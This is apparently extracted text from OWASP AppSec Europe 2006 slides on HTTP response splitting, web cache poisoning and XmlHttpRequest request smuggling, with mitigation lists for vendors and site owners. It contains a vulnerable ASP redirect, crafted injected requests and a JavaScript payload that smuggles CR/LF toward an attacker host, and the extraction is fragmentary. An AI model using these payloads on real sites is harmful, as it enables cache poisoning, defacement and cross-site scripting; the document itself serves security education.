Professional Documents
Culture Documents
e The OWASP
May 2006 http://www.owasp.org/
Foundation
Introduction ([1])
<%
Response.Redirect "http://www.the.site/new_page.asp?
lang=" & Request.QueryString("lang")
%>
Normal request:
http://www.the.site/welcome.asp?lang=Hebrew
Normal Response:
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 20
<html>Gotcha</html>Connection: Keep-Alive
Content-Length: 0
Participants:
Web site (with the vulnerability)
Cache proxy server
Attacker
Attack idea:
The attacker sends two requests:
1. HTTP response splitter
2. An innocent request for http://www.the.site/index.html
The proxy server will match the first request to the first response,
and the second (“innocent”) request to the second response (the
“Gotcha!” page), thus caching the attacker’s contents.
302
302
Theoretic results
302
302
200
(Gotcha!)
request
/account?id=victim
200
(Victim’s account data)
200
(Victim’s account data)
OWASP AppSec Europe 2006 17
Attacks round-up
We have seen:
Web cache poisoning
Response hijacking
Temporary defacement (server side XSS++)
Content-Length: 44 Server:
1. /foobar.html
2. /poison.html
GET /poison.html HTTP/1.1
Host: SITE
Bla: GET http://SITE/welcome.html HTTP/1.1
We have seen
Partial cache poisoning
Goal:
(part I) Forging “difficult” headers (e.g. Referer)
Importance: subverts “defenses” that rely on Referer, e.g.
suggestions for CSRF protection, anti-leaching, etc.
(part I) Scanning (e.g. internal networks)
Importance: ability to access content of “off site” pages
(part II) General XSS
(part II) “local defacement” (browser cache poisoning)
Usual suspect: XmlHttpRequest
Restricted by same origin security policy (enforced by
the browser).
Now if there’s a proxy (or virtual server)…
x.open("GET\thttp://www.attacker.site/dum
my.html\tHTTP/1.1\r\nHost:\twww.attacker.site
\r\nConnection:\tKeep-
Alive\r\n\r\nGET","/payload.html",false);
x.send();
window.open("http://www.target.site");
Browser vendors
Strict sanitation/validation of the various
XmlHttpRequest fields (method, URL, headers)
Sites
SSL only site
Application programmers
Sanitize data going to HTTP headers against CR and LF.
Web server/framework vendors
Stricter filtering (no CRs, no LFs)
HTTP-enabled intermediaries
Reject non RFC-compliant responses
Site owners
SSL only site
You’re hacked
Defacement
Web cache poisoning
Domain hijacking
Cyber-squatting (no hacking really)
Goal: effectively extending the defacement condition
“forever”, esp. after the attack is “reversed”.
By carefully designing the attack, the attacker can cause
defaced pages to be cached for very long time.
Cached pages can
Interact with real content (same domain!)
Interact with (and direct the victim to ) the attacker’s site
HTTP-enabled intermediaries
Disallow TRACE
Browser vendors
Disallow TRACE as a method in
XmlHttpRequest.
Disallow any non-alphanumeric method in
XmlHttpRequest.
Site owners
Abandon NTLM HTTP Auth
Proxy vendors
Don’t share connections
Send VIA by default